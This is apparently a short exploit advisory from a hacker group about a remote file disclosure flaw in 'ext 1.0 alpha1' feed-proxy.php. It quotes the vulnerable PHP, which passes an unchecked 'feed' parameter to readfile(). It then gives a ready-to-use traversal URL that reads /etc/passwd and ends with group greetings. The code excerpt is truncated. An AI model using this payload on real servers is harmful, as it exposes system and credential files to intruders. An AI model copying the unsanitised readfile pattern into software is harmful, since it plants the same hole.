ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
Discovered by: Alkomandoz Hacker
V.Code In /examples/layout/feed-proxy.php
header('Content-Type: text/xml');
readfile($feed);
return;
}
?>
Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=http…/…/…/…/…/…/etc/passwd
Greetz To: AsbMay's Group & City Of Ghost Team